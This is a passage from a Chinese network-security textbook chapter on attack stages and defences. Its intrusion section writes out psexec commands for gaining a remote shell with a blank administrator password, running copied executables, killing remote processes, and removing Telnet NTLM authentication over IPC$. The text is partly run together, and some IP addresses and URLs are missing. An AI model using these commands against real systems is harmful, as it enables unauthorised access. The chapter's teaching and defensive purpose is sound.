第2章 網(wǎng)絡(luò)攻擊與防范

第2章網(wǎng)絡(luò)攻擊與防范網(wǎng)絡(luò)攻擊概述

2.1網(wǎng)絡(luò)攻擊的準(zhǔn)備階段

2.2網(wǎng)絡(luò)攻擊的實施階段

2.3網(wǎng)絡(luò)攻擊的善后階段

2.4本章學(xué)習(xí)要點了解黑客的由來和發(fā)展掌握常見網(wǎng)絡(luò)攻擊的分類和目的了解網(wǎng)絡(luò)攻擊的步驟掌握一般網(wǎng)絡(luò)攻擊的防范方法

2.1網(wǎng)絡(luò)攻擊概述2.1.1黑客的概述1．黑客的由來黑客是“Hacker”的音譯，源于動詞Hack，其引申意義是指“干了一件非常漂亮的事”。

這里說的黑客是指那些精于某方面技術(shù)的人。對于計算機(jī)而言，黑客就是精通網(wǎng)絡(luò)、系統(tǒng)、外部設(shè)備以及軟硬件技術(shù)的人。

真正的黑客有自己獨特的文化和精神，他們并不破壞別人的系統(tǒng)，他們崇拜技術(shù)，對計算機(jī)系統(tǒng)進(jìn)行智力上的自由探索。早期的黑客是指真正的程序員，他們活躍在計算機(jī)技術(shù)發(fā)展的早期，使用機(jī)器語言、匯編語言以及很多古老的語言編寫程序，將大部分時間花在計算機(jī)的程序設(shè)計上，并以此為樂。到了20世紀(jì)80年代以后，隨著計算機(jī)網(wǎng)絡(luò)技術(shù)的發(fā)展，現(xiàn)代的黑客們把精力放在了尋找各種系統(tǒng)漏洞上，并通過暴露網(wǎng)絡(luò)系統(tǒng)中的缺陷與非授權(quán)更改服務(wù)器等行為，達(dá)到表現(xiàn)自我和反對權(quán)威的目的。2．黑客的行為發(fā)展趨勢（1）黑客群體的擴(kuò)大化（2）黑客的組織化和團(tuán)體化（3）動機(jī)復(fù)雜化2.1.2常見的網(wǎng)絡(luò)攻擊黑客攻擊和網(wǎng)絡(luò)安全是緊密結(jié)合在一起的，研究網(wǎng)絡(luò)安全而不研究黑客攻擊技術(shù)簡直是紙上談兵，研究攻擊技術(shù)而不研究網(wǎng)絡(luò)安全就是閉門造車。從某種意義上說，沒有攻擊就沒有安全，系統(tǒng)管理員可以利用常見的攻擊手段對系統(tǒng)進(jìn)行檢測，并對相關(guān)的漏洞采取有效的補救措施。網(wǎng)絡(luò)攻擊有善意的也有惡意的。

善意的攻擊可以幫助系統(tǒng)管理員檢查系統(tǒng)漏洞。

惡意的攻擊包括為了私人恩怨而攻擊、出于商業(yè)或個人目的獲得秘密資料、利用對方的系統(tǒng)資源滿足自己的需求、尋求刺激、給別人幫忙以及一些無目的的攻擊等。1．攻擊目的（1）竊取信息（2）獲取口令（3）控制中間站點（4）獲得超級用戶權(quán)限2．攻擊事件分類外部攻擊內(nèi)部攻擊行為濫用實施外部攻擊的方法很多，從攻擊者目的的角度來講，可將攻擊事件分為以下5類。（1）破壞型攻擊（2）利用型攻擊（3）信息收集型攻擊（4）網(wǎng)絡(luò)欺騙攻擊（5）垃圾信息攻擊2.1.3攻擊步驟圖2.1攻擊步驟2.2網(wǎng)絡(luò)攻擊的準(zhǔn)備階段2.2.1社會工程學(xué)介紹1．社會工程學(xué)的概述社會工程學(xué)就是利用人的心理弱點（如人的本能反應(yīng)、好奇心、信任、貪婪）、規(guī)章與制度的漏洞等進(jìn)行欺騙、傷害等，以期獲得所需的信息（如計算機(jī)口令、銀行賬號信息）。社會工程學(xué)有狹義與廣義之分。

廣義與狹義社會工程學(xué)最明顯的區(qū)別是會與受害者進(jìn)行交互式行為。

例如，通過設(shè)置一個陷阱使對方掉入，或是偽造的虛假電子郵件，或者利用相關(guān)通信工具與他們交流獲取敏感信息。廣義的社會工程學(xué)是清楚地知道自己需要什么信息，應(yīng)該怎樣去做，從收集的信息當(dāng)中分析出應(yīng)該與哪個關(guān)鍵人物交流。社會工程學(xué)入侵與傳統(tǒng)的黑客入侵有著本質(zhì)的區(qū)別，是非傳統(tǒng)的信息安全。

它不是利用漏洞入侵，而是利用人性的漏洞。它是無法用硬件防火墻、入侵檢測系統(tǒng)，虛擬專用網(wǎng)絡(luò)，或是安全軟件產(chǎn)品來防御的。

社會工程學(xué)不是單純針對系統(tǒng)入侵與源代碼竊取，本質(zhì)上，它在黑客攻擊邊沿上獨立并平衡著。它的威脅不僅僅是信息安全，還包括能源、經(jīng)濟(jì)、文化、恐怖主義等。國防大學(xué)盧凡博士曾經(jīng)說過：“它（社會工程學(xué)攻擊）并不能等同于一般的欺騙手法，即使自認(rèn)為最警惕最小心的人，一樣會受到高明的社會工程學(xué)手段的損害，因為社會工程學(xué)主導(dǎo)著非傳統(tǒng)信息安全，所以通過對它的研究可以提高對非傳統(tǒng)信息安全事件的能力?！?．主要攻擊手段（1）網(wǎng)絡(luò)釣魚攻擊（2）傳統(tǒng)的社交手段2.2.2網(wǎng)絡(luò)信息搜集1．常用DOS命令（1）ping命令ping命令的使用格式如下。ping[-t][-a][-l][-ncount][-iTTL]參數(shù)說明如下。[-t]一直ping下去，直到按下“Ctrl+C”組合鍵結(jié)束字節(jié)。[-a]ping的同時把IP地址轉(zhuǎn)換成主機(jī)名。[-l]指定數(shù)據(jù)包的大小，默認(rèn)為32個字節(jié)，最大為65

527個字節(jié)。[-f]在數(shù)據(jù)包中發(fā)送“不要分段”標(biāo)志，數(shù)據(jù)包不會被路由設(shè)備分段。[-ncount]設(shè)定ping的次數(shù)。[-iTTL]設(shè)置ICMP包的生存時間（指ICMP包能夠傳到臨近的第幾個節(jié)點）。操作系統(tǒng)默認(rèn)TTL返回值UNIX類255Windows9532WindowsNT/2000/2003128CompaqTru645.064表2.1 不同的操作系統(tǒng)對ping的TTL返回值①由域名得到網(wǎng)站IP地址。方法一：ping命令試探。使用命令：ping域名。例如，黑客想知道百度服務(wù)器的IP地址，可以在MS-DOS中輸入“ping”命令，如圖2.2所示。圖2.2ping命令試探從圖2.2可以看出，對應(yīng)的IP地址為3。方法二：nslookup命令。使用命令：nslookup域名。同樣以百度服務(wù)器為例，在MS-DOS中輸入“nslookup”命令，按“Enter”鍵后得到域名查詢結(jié)果，如圖2.3所示。圖2.3nslookup命令試探

從圖2.3返回的結(jié)果分析，Addresses后面列出的就是所使用的Web服務(wù)器群里的IP。上面介紹的是黑客經(jīng)常使用的兩種最基本的方法。此外，還有一些軟件（如Lansee）附帶域名轉(zhuǎn)換IP的功能，實現(xiàn)起來更簡單，功能更強大。

從這兩種方法中可以看出，ping命令方便、快捷，nslookup命令查詢到的結(jié)果更為詳細(xì)。②由IP得到目標(biāo)主機(jī)的地理位置。由于IP地址的分配是全球統(tǒng)一管理的，因此黑客可以通過查詢有關(guān)機(jī)構(gòu)的IP地址數(shù)據(jù)庫來得到該IP所對應(yīng)的地理位置，由于IP管理機(jī)構(gòu)多處于國外，而且分布比較零散，因此在這里介紹一個能查詢到IP數(shù)據(jù)庫的網(wǎng)站。網(wǎng)址：，如圖2.4所示。圖2.4查詢數(shù)據(jù)庫的網(wǎng)站

圖2.5查詢結(jié)果（2）netstat命令netstat命令有助于了解網(wǎng)絡(luò)的整體使用情況。

它可以顯示當(dāng)前正在活動的網(wǎng)絡(luò)連接的詳細(xì)信息，如采用的協(xié)議類型、當(dāng)前主機(jī)與遠(yuǎn)端相連主機(jī)（一個或多個）的IP地址以及它們之間的連接狀態(tài)等。netstat命令的使用格式如下。netstat[-a][-e][-n][-s][-pproto][-r][interval]參數(shù)說明如下。[-a]顯示所有主機(jī)的端口號。[-e]顯示以太網(wǎng)統(tǒng)計信息，該參數(shù)可以與-s選項結(jié)合使用。[-n]以數(shù)字表格形式顯示地址和端口。[-s]顯示每個協(xié)議的使用狀態(tài)（包括TCP、UDP、IP）。[-pproto]顯示特定協(xié)議的具體使用信息。[-r]顯示本機(jī)路由表的內(nèi)容。[interval]重新顯示所選的狀態(tài)，每次顯示之間的間隔數(shù)（單位秒）。netstat命令的主要用途是檢測本地系統(tǒng)開放的端口，這樣做可以了解自己的系統(tǒng)開放了什么服務(wù)，還可以初步推斷系統(tǒng)是否存在木馬，因為常見的網(wǎng)絡(luò)服務(wù)開放的默認(rèn)端口輕易不會被木馬占用。（3）nbtstat命令nbtstat命令用于顯示本地計算機(jī)和遠(yuǎn)程計算機(jī)的基于TCP/IP（NetBT）的NetBIOS統(tǒng)計資料、NetBIOS名稱表和NetBIOS名稱緩存。nbtstat可以刷新NetBIOS名稱緩存和注冊的WindowsInternet名稱服務(wù)（WINS）名稱。

使用不帶參數(shù)的nbtstat顯示幫助。nbtstat命令的使用格式如下。nbtstat [-aremotename][-AIPaddress][-c][-n][-r][-R][-RR][-s][-S][Interval]參數(shù)說明如下。[-aremotename]顯示遠(yuǎn)程計算機(jī)的NetBIOS名稱表，其中，remotename是遠(yuǎn)程計算機(jī)的NetBIOS計算機(jī)名稱。[-AIPaddress]顯示遠(yuǎn)程計算機(jī)的NetBIOS名稱表，其名稱由遠(yuǎn)程計算機(jī)的IP地址指定（以小數(shù)點分隔）。[-c]顯示NetBIOS名稱緩存內(nèi)容、NetBIOS名稱表及其解析的各個地址。[-n]顯示本地計算機(jī)的NetBIOS名稱表。[-r]顯示NetBIOS名稱解析統(tǒng)計資料。[-R]清除NetBIOS名稱緩存的內(nèi)容，并從Lmhosts文件中重新加載帶有#PRE標(biāo)記的項目。[-RR]重新釋放并刷新通過WINS注冊的本地計算機(jī)的NetBIOS名稱。[-s]顯示NetBIOS客戶和服務(wù)器會話，并試圖將目標(biāo)IP地址轉(zhuǎn)化為名稱。[-S]顯示NetBIOS客戶和服務(wù)器會話，只通過IP地址列出遠(yuǎn)程計算機(jī)。[Interval]重新顯示選擇的統(tǒng)計資料，可以中斷每個顯示之間的Interval中指定的秒數(shù)。如果省略該參數(shù)，nbtstat將只顯示一次當(dāng)前的配置信息。2．網(wǎng)站信息搜集（1）中國互聯(lián)網(wǎng)絡(luò)信息中心（2）中國萬網(wǎng)（3）EDGAR數(shù)據(jù)庫圖2.6中國互聯(lián)網(wǎng)絡(luò)信息中心查詢界面圖2.7中國萬網(wǎng)查詢界面3．結(jié)構(gòu)探測一般來說，網(wǎng)絡(luò)的基本結(jié)構(gòu)如圖2.8所示。圖2.8網(wǎng)絡(luò)的基本結(jié)構(gòu)4．搜索引擎（1）Google（2）百度（3）Yahoo（4）MSNSearch2.2.3資源搜集1．共享資源簡介（1）共享資源（2）建立共享的條件2．共享資源搜索（1）掃描器簡介（2）常用掃描器工具3．破解Windows9x共享密碼4．FTP資料掃描5．安全解決方案2.2.4端口掃描1．網(wǎng)絡(luò)基礎(chǔ)知識（1）端口的基本概念“端口”在計算機(jī)網(wǎng)絡(luò)領(lǐng)域中是個非常重要的概念。

它是專門為計算機(jī)通信而設(shè)計的，它不是硬件，不同于計算機(jī)中的“插槽”，可以說是個“軟端口”。端口是由計算機(jī)的通信協(xié)議TCP/IP定義的。

其中規(guī)定，用IP地址和端口作為套接字，它代表TCP連接的一個連接端，一般稱為Socket。具體來說，就是用[IP：端口]來定位一臺主機(jī)中的進(jìn)程。

可以用這樣的比喻：端口相當(dāng)于兩臺計算機(jī)進(jìn)程間的大門，可以任意定義，其目的只是為了讓兩臺計算機(jī)能夠找到對方的進(jìn)程。計算機(jī)就像一座大樓，這個大樓有好多入口（端口），進(jìn)到不同的入口中就可以找到不同的公司（進(jìn)程）。

如果要和遠(yuǎn)程主機(jī)A的程序通信，那么只要把數(shù)據(jù)發(fā)向[A：端口]就可以實現(xiàn)通信了?？梢姡丝谂c進(jìn)程是一一對應(yīng)的，如果某個進(jìn)程正在等待連接，稱之為該進(jìn)程正在監(jiān)聽，那么就會出現(xiàn)與它相對應(yīng)的端口。由此可見，入侵者通過掃描端口，便可以判斷出目標(biāo)計算機(jī)有哪些通信進(jìn)程正在等待連續(xù)。（2）端口的分類服務(wù)名稱端口號說明FTP21文件傳輸服務(wù)Telnet23遠(yuǎn)程登錄服務(wù)HTTP80網(wǎng)頁瀏覽服務(wù)POP3110郵件服務(wù)SMTP25簡單郵件傳輸服務(wù)SOCK51080代理服務(wù)表2.2 常見TCP公認(rèn)端口號服務(wù)名稱端口號說明RPC111遠(yuǎn)程調(diào)用SNMP161簡單網(wǎng)絡(luò)管理TFTP69簡單文件傳輸表2.3 常見UDP公認(rèn)端口號2．端口掃描原理（1）全TCP連接（2）半打開式掃描（SYN掃描）（3）FIN掃描（4）第三方掃描3．掃描工具（1）掃描器X-ScanX-Scan的主界面如圖2.10所示。圖2.10X-Scan的主界面（2）流光Fluxay（3）X-Port（4）SuperScan（5）其他端口掃描工具2.3網(wǎng)絡(luò)攻擊的實施階段2.3.1基于認(rèn)證的入侵及防范1．IPC$入侵IPC$是Windows系統(tǒng)特有的一項管理功能，是Microsoft公司為了方便用戶使用計算機(jī)而設(shè)定的，主要用來遠(yuǎn)程管理計算機(jī)。建立、復(fù)制、刪除遠(yuǎn)程計算機(jī)文件。在遠(yuǎn)程計算機(jī)上執(zhí)行命令?？梢姡琁PC$在為管理員提供了方便的同時，也留下了嚴(yán)重的安全隱患。

解決方案有以下3種。①刪除默認(rèn)共享。②禁止空連接進(jìn)行枚舉攻擊。③關(guān)閉Server服務(wù)。2．Telnet入侵Telnet用于提供遠(yuǎn)程登錄服務(wù)，當(dāng)終端用戶登錄到提供這種服務(wù)的主機(jī)時，就會得到一個shell（命令行），通過這個shell，終端用戶便可以執(zhí)行遠(yuǎn)程主機(jī)上的任何程序。同時用戶將作為這臺主機(jī)的終端來使用該主機(jī)的CPU資源和內(nèi)存資源，實現(xiàn)完全控制遠(yuǎn)程主機(jī)。Telnet登錄控制是入侵者經(jīng)常使用的方式。3．遠(yuǎn)程命令執(zhí)行及進(jìn)程查殺（1）工具PSEXEC該工具為遠(yuǎn)程執(zhí)行命令軟件。

在本地機(jī)上使用PSEXEC即可在遠(yuǎn)程主機(jī)上執(zhí)行命令。其使用方法如下。PSEXEC\\computer[-uuser][-ppassword][-s][-i][-c][-f][-d]cmd[arguments]各參數(shù)含義如下。[-u]登錄遠(yuǎn)程主機(jī)的用戶名。[-p]登錄遠(yuǎn)程主機(jī)的密碼。[-i]與遠(yuǎn)程主機(jī)交互執(zhí)行。[-c]拷貝本地文件到遠(yuǎn)程主機(jī)系統(tǒng)并執(zhí)行。[-f]拷貝本地文件到遠(yuǎn)程主機(jī)系統(tǒng)目錄并執(zhí)行，如果遠(yuǎn)程主機(jī)已經(jīng)存在該文件，則覆蓋。[-d]不等待程序結(jié)束。通過PSEXEC實現(xiàn)與Telnet登錄同樣的功能。

使用命令psexec\\06-uadministrator-p“”cmd，如圖2.11所示。圖2.11PSEXEC登錄還可以使用PSEXEC，將本地可執(zhí)行程

序拷貝到遠(yuǎn)程主機(jī)執(zhí)行，如運行命令psexec\\06-uadministrator-p“”-ccalc.exe，如圖2.12所示。圖2.12將本地可執(zhí)行程序拷貝到遠(yuǎn)程主機(jī)執(zhí)行

（2）查殺進(jìn)程入侵者對遠(yuǎn)程主機(jī)的徹底控制，還包括遠(yuǎn)程查看、殺死遠(yuǎn)程主機(jī)的進(jìn)程。

使用PSEXEC和Aproman可以實現(xiàn)這一過程。其中，工具“PSEXEC”用來遠(yuǎn)程執(zhí)行命令，工具“AproMan”用來查看進(jìn)程、端口與進(jìn)程的關(guān)聯(lián)關(guān)系，并殺死指定進(jìn)程，還可以把進(jìn)程和模塊列表導(dǎo)出到文本文件中。Aproman的使用方法如下。AProMan.exe-a：查看進(jìn)程。Aproman.exe-p：顯示端口進(jìn)程關(guān)聯(lián)關(guān)系（需要Administrator權(quán)限）。Aproman.exe-t[PID]：殺掉指定進(jìn)程號的進(jìn)程。Aproman.exe-f[FileName]：把進(jìn)程及模塊信息存入文件。使用PSEXEC和Aproman查、殺進(jìn)程實例。步驟1：將Aproman.exe拷貝到本機(jī)磁盤。步驟2：使用PSEXEC將Aproman.exe拷貝到目的主機(jī)并執(zhí)行。步驟3：通過指定進(jìn)程號殺死遠(yuǎn)程主機(jī)的進(jìn)程。使用命令psexec\\06-uadministrator-p“”-daproman-t1280。除了使用工具“PSEXEC”與“AproMan”來實現(xiàn)查殺進(jìn)程外，還可以通過工具“pslist.exe”與“pskill.exe”。通過這兩款工具實現(xiàn)查殺進(jìn)程，并不用把任何程序拷貝到遠(yuǎn)程主機(jī)內(nèi)部，pslist.exe和pskill.exe可在本地對遠(yuǎn)程主機(jī)的進(jìn)程進(jìn)行操作。

其中“pslist.exe”使用方法如下。pslist.exe是命令行方式下遠(yuǎn)程查看進(jìn)程的工具，其使用方法為

pslist[-t][-m][-x]\\computer[-uusername][-ppassword][name/pid]其中，各參數(shù)含義如下。[-t]顯示線程。[-m]顯示內(nèi)存細(xì)節(jié)。[-x]顯示進(jìn)程、內(nèi)存和線程。name列出指定用戶的進(jìn)程。pid顯示指定PID的進(jìn)程信息。pskill.exe是命令行方式下遠(yuǎn)程殺進(jìn)程的工具，其使用方式為pskill\\computer[-u用戶名][進(jìn)程號/進(jìn)程名]4．遠(yuǎn)程管理計算機(jī)（1）打開“計算機(jī)管理”方法1：通過“控制面板”→“管理工具”→“計算機(jī)管理”打開。方法2：通過“運行“對話框輸入“compmgmt.msc/s”命令打開。方法3：右擊“我的電腦”，在彈出的快捷菜單中選擇“管理”選項。（2）遠(yuǎn)程管理服務(wù)Telnet（3）開啟遠(yuǎn)程主機(jī)服務(wù)的其他方法（4）去掉NTLM驗證的方法由于Telnet功能太強大，而且也是入侵者使用最頻繁的登錄手段之一，因此微軟為Telnet添加了身份認(rèn)證，稱為NTLM驗證。它要求Telnet終端除了需要有Telnet服務(wù)主機(jī)的用戶名和密碼外，還需要滿足NTLM驗證。方法1：①在本地計算機(jī)建立一個與遠(yuǎn)程主機(jī)相同的賬號和密碼，如圖2.13所示。圖2.13建立與遠(yuǎn)程主機(jī)相同的賬號和密碼②通過“開始”→“程序”→“附件”找到“命令提示符”，然后右擊“命令提示符”，在彈出的快捷菜單中選擇“屬性”選項。

在“以其他用戶身份運行”前面打鉤，如圖2.14所示。圖2.14以其他用戶身份運行的對話框

③單擊“確定”按鈕，在MS-DOS界面中進(jìn)行Telnet登錄。方法2：通過修改遠(yuǎn)程計算機(jī)Telnet服務(wù)設(shè)置去除NTLM驗證。①首先建立telnet.txt文件，然后寫入3，7，y，0，y，0，0。②建立批處理文件tel.bat，輸入命令tlntadmn<telnet.txt。該命令是把telnet.txt中的內(nèi)容導(dǎo)入tlntadmn.exe。③建立IPC$連接，將telnet.txt和tel.bat拷貝到遠(yuǎn)程計算機(jī)，并通過at命令執(zhí)行tel.bat，去除NTLM認(rèn)證。2.3.2基于IIS漏洞的入侵及防范IIS被稱為Internet信息服務(wù)器。

它在Windows系統(tǒng)中提供Internet服務(wù)，作為Windows組件附加在Windows系統(tǒng)中。

通過IIS，Windows系統(tǒng)的用戶可以方便地提供Web服務(wù)、FTP服務(wù)、SMTP服務(wù)等。IIS服務(wù)器在方便用戶使用的同時，也帶來了許多安全隱患。

據(jù)說IIS的漏洞有千余種，能被用來入侵的漏洞大多數(shù)屬于“溢出”型漏洞。對于這種漏洞，入侵者能夠通過發(fā)送特定格式的數(shù)據(jù)來使遠(yuǎn)程服務(wù)器緩沖區(qū)溢出，從而突破系統(tǒng)的保護(hù)在溢出后的空間中執(zhí)行任何命令。1．.ida&.idq漏洞其具體描述如表2.4所示。漏洞描述ISAPI擴(kuò)展存在遠(yuǎn)程緩沖溢出漏洞。攻擊者可以利用該漏洞獲得Web服務(wù)器的System權(quán)限來訪問遠(yuǎn)程系統(tǒng)受影響系統(tǒng)MicrosoftWindowsNT4.0（SP0-SP6）MicrosoftWindows2000（SP0-SP2）檢測方法手工檢測；工具監(jiān)測（X-Scan）解決方案（1）為Windows2000操作系統(tǒng)打SP4補?。?）為該漏洞安裝補丁（3）刪除.ida&.idq的腳本映射建議：即使已經(jīng)為該漏洞安裝了補丁，最好還是刪除.IDA映射刪除方法：打開Internet服務(wù)管理器；右擊服務(wù)器并在彈出的快捷菜單中選擇“屬性”選項；選擇“主屬性”，選擇“WWW服務(wù)”→“編輯”→“主目錄”→“配置”，在擴(kuò)展名列表中刪除.ida和.idq項（4）到微軟技術(shù)站點上下載URLSCAN并安裝，URLSCAN默認(rèn)設(shè)置下就會拒絕所有對.ida&.idq映射的請求表2.4 .ida&.idq漏洞簡介2．.Printer漏洞其具體描述如表2.5所示。漏洞描述Windows2000IIS5.0.printerISAPI擴(kuò)展存在緩沖區(qū)溢出漏洞一般情況下攻擊會使Web服務(wù)器停止響應(yīng)，但Windows2000會檢測到Web服務(wù)沒有響應(yīng)而重新啟動服務(wù)器，因此，管理員比較難發(fā)現(xiàn)這種攻擊該漏洞非常危險，僅僅需要Windows2000打開80端口（http）或者443端口（https），微軟公司強烈要求在未打補丁之前一定要移除ISAPI網(wǎng)絡(luò)打印的映射受影響系統(tǒng)Windows2000Server（IIS5.0）Windows2000AdvancedServer（IIS5.0）Windows2000DatacenterServer（IIS5.0）檢測方法工具檢測（X-Scan）解決方案（1）為Windows2000操作系統(tǒng)打SP4補?。?）安裝漏洞補丁表2.5 .printer漏洞簡介3．Unicode漏洞其具體描述如表2.6所示。漏洞描述該漏洞既是一個遠(yuǎn)程漏洞，同時也是一個本地漏洞，攻擊者可通過IE瀏覽器遠(yuǎn)程運行被攻擊計算機(jī)的cmd.exe文件，從而使該計算機(jī)的文件暴露，且可隨意執(zhí)行和更改文件微軟IIS4.0和IIS5.0都存在利用擴(kuò)展Unicode字符取代“/”和“\”而能利用“../”目錄遍歷的漏洞。未經(jīng)授權(quán)的用戶可能利用IUSR_machinename賬號的上下文空間訪問任何已知的文件。該賬號在默認(rèn)情況下屬于Everyone和Users組的成員，因此任何與Web根目錄在同一邏輯驅(qū)動器上的能被這些用戶組訪問的文件都能被刪除、修改或執(zhí)行，就如同一個用戶成功登錄所能完成的一樣受影響系統(tǒng)MicrosoftWindowsNT/2000（IIS5.0）MicrosoftWindowsNT4.0（IIS4.0）檢測方法手工檢測；工具檢測（X-Scan）解決方案（1）為Windows2000操作系統(tǒng)安裝補丁SP4（2）安裝漏洞補丁IIS4.0：/ntserver/nts/downloads/critical/q269862/default.aspIIS5.0：/windows2000/downloads/critical/q269862/default.asp（3）安裝IISLockdown和URLScan來加固系統(tǒng)（4）臨時解決方法如果不需要可執(zhí)行的CGI，可以刪除可執(zhí)行虛擬目錄，如/scripts等。如果確實需要可執(zhí)行的虛擬目錄，建議將可執(zhí)行虛擬目錄單獨放在一個分區(qū)表2.6 Unicode漏洞簡介4．.asp映射分塊編碼漏洞其具體描述如表2.7所示。漏洞描述Windows2000和NT4IIS.asp映射存在遠(yuǎn)程緩沖溢出漏洞ASPISAPI過濾器默認(rèn)在所有NT4和Windows2000系統(tǒng)中裝載，存在的漏洞可以導(dǎo)致遠(yuǎn)程執(zhí)行任意命令。惡意攻擊者可以使用分塊編碼形式把數(shù)據(jù)傳送給IIS服務(wù)器，當(dāng)解碼和解析這些數(shù)據(jù)時，可以強迫IIS把入侵者提供的數(shù)據(jù)寫到內(nèi)存的任意位置。此漏洞會導(dǎo)致Windows2000系統(tǒng)產(chǎn)生緩沖溢出，并以IWAM_computer_name用戶的權(quán)限執(zhí)行任意代碼，而在WindowsNT4下可以以system的權(quán)限執(zhí)行任意代碼受影響系統(tǒng)MicrosoftWindowsNT4.0+IIS4.0MicrosoftWindows2000+IIS5.0檢測方法工具檢測（X-Scan）解決方案（1）為操作系統(tǒng)打補?。?）安裝漏洞補丁表2.7 .asp漏洞簡介5．WebDAV遠(yuǎn)程緩沖區(qū)溢出漏洞其具體描述如表2.8所示。漏洞描述MicrosoftIIS5.0帶有WebDAV組件，對用戶輸入的傳遞給ntdll.dll程序處理的請求未做充分的邊界檢查，遠(yuǎn)程入侵者可以通過向WebDAV提交一個精心構(gòu)造的超長數(shù)據(jù)請求而導(dǎo)致發(fā)生緩沖區(qū)溢出。這可能使入侵者以localsystem的權(quán)限在主機(jī)上執(zhí)行任意指令受影響系統(tǒng)Windows2000（SP0-SP3）檢測方法WebDAVScan.exe是IIS中WebDAV漏洞的專用掃描器解決方案為操作系統(tǒng)打系統(tǒng)補丁表2.8 WebDAV遠(yuǎn)程緩沖區(qū)溢出漏洞簡介2.3.3基于電子郵件服務(wù)的攻擊及防范下面介紹一些我們經(jīng)常遇到的漏洞。（1）IMAP和POP漏洞（2）拒絕服務(wù)（DoS）攻擊（3）系統(tǒng)配置漏洞（4）利用軟件問題（5）利用人為因素（6）特洛伊木馬及病毒傳播2.3.4注冊表的入侵及防范1．注冊表相關(guān)知識從Windows95開始，Microsoft在Windows中引入了注冊表（Registry），用于代替原來Win32系統(tǒng)里.ini文件。注冊表是Windows用來管理配置系統(tǒng)運行參數(shù)的一個核心數(shù)據(jù)庫。

在這個數(shù)據(jù)庫里整合集成了全部系統(tǒng)和應(yīng)用程序的初始化信息，其中包含了硬件設(shè)備的說明、相互關(guān)聯(lián)的應(yīng)用程序與文檔文件、窗口顯示方式、網(wǎng)絡(luò)連接參數(shù)，甚至有關(guān)系到計算機(jī)安全的網(wǎng)絡(luò)共享設(shè)置。它與老的Win32系統(tǒng)里的.ini文件相比，具有方便管理、安全性較高、適于網(wǎng)絡(luò)操作等特點。

如果注冊表受到了破壞，輕者使Windows的啟動過程出現(xiàn)異常，重者可能會導(dǎo)致整個系統(tǒng)的完全癱瘓。用戶通過注冊表可以輕易地添加、刪除、修改系統(tǒng)內(nèi)的軟件配置信息或硬件驅(qū)動程序，大大方便了用戶對軟硬件的工作狀態(tài)進(jìn)行調(diào)整。與此同時，入侵者也經(jīng)常通過注冊表來種植木馬、修改軟件信息，甚至刪除、停用或改變硬件的工作狀態(tài)。首先了解一下注冊表的基本知識。

在“運行”對話框中輸入“regedit”，然后單擊“確定”按鈕，就可以運行注冊表編輯器。在注冊表中，所有的數(shù)據(jù)都是通過一種樹狀分層結(jié)構(gòu)來組織的，由子樹、鍵、子鍵和鍵值組成，十分類似于目錄結(jié)構(gòu)，如圖2.15所示。

表2.9、表2.10所示為注冊表的基本知識。圖2.15注冊表的分層結(jié)構(gòu)根項名稱說明HKEY_LOCAL_MACHINE包含關(guān)于本地計算機(jī)系統(tǒng)的信息，包括硬件和操作系統(tǒng)數(shù)據(jù)，如總線類型、系統(tǒng)內(nèi)存、設(shè)備驅(qū)動程序和啟動控制數(shù)據(jù)HKEY_CLASSES_ROOT包含由各種OLE技術(shù)使用的信息和文件類別關(guān)聯(lián)數(shù)據(jù)。如果HKEY_LOCAL_MACHINE（或HKEY_CURRENT_USER）\SOFTWARE\Classes中存在某個鍵或值，則對應(yīng)的鍵或值將出現(xiàn)在HKEY_CLASSES_ROOT中。如果兩處均存在鍵或值，HKEY_CURRENT_USER版本將是出現(xiàn)在HKEY_CLASSES_ROOT中的一個HKEY_CURRENT_USER包含當(dāng)前以交互方式（與遠(yuǎn)程方式相反）登錄的用戶的用戶配置文件，包括環(huán)境變量、桌面設(shè)置、網(wǎng)絡(luò)連接、打印機(jī)和程序首選項。該子目錄樹是HKEY_USERS子目錄的別名，并指向HKEY_USERS\當(dāng)前用戶的安全I(xiàn)DHKEY_USERS包含關(guān)于動態(tài)加載的用戶配置文件和默認(rèn)配置文件的信息。包含同時出現(xiàn)在HKEY_CURRENT_USER中的信息。要遠(yuǎn)程訪問服務(wù)器的用戶在服務(wù)器上的該項下沒有配置文件，它們的配置文件將加載到它們自己計算機(jī)的注冊表中HKEY_CURRENT_CONFIG包含在啟動時由本地計算機(jī)系統(tǒng)使用的硬件配置文件的相關(guān)信息，該信息用于配置一些設(shè)置，如要加載的設(shè)備驅(qū)動程序和顯示時要使用的分辨率，該子目錄樹是HKEY_LOCAL_MACHINE子目錄樹的一部分，并指向HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\HardwareProfiles\Current表2.9 注冊表根項名稱說明數(shù)據(jù)類型說明REG_BINARY未處理的二進(jìn)制數(shù)據(jù)。二進(jìn)制是沒有長度限制的，可以是任意個字節(jié)的長度。多數(shù)硬件組件信息都以二進(jìn)制數(shù)據(jù)存儲，而以十六進(jìn)制格式顯示在注冊表編輯器中，如：“CustomColors”的鍵值就是一個二進(jìn)制數(shù)據(jù)，雙擊鍵值名，出現(xiàn)“編輯二進(jìn)制數(shù)值”對話框，進(jìn)行設(shè)置REG_DWORD數(shù)據(jù)由4字節(jié)（32位）長度的數(shù)表示。許多設(shè)備驅(qū)動程序和服務(wù)的參數(shù)都是這種類型，并在注冊表編輯器中以二進(jìn)制、十六進(jìn)制或十進(jìn)制的格式顯示REG_EXPAND_SZ長度可變的數(shù)據(jù)串，一般用來表示文件的描述、硬件的標(biāo)識等，通常由字母和數(shù)字組成，最大長度不能超過255個字符REG_MULTI_SZ多個字符串。其中格式可被用戶讀取的列表或多值。常用空格、逗號或其他標(biāo)記分開REG_SZ固定長度的文本串REG_FULL_RESOURCE_

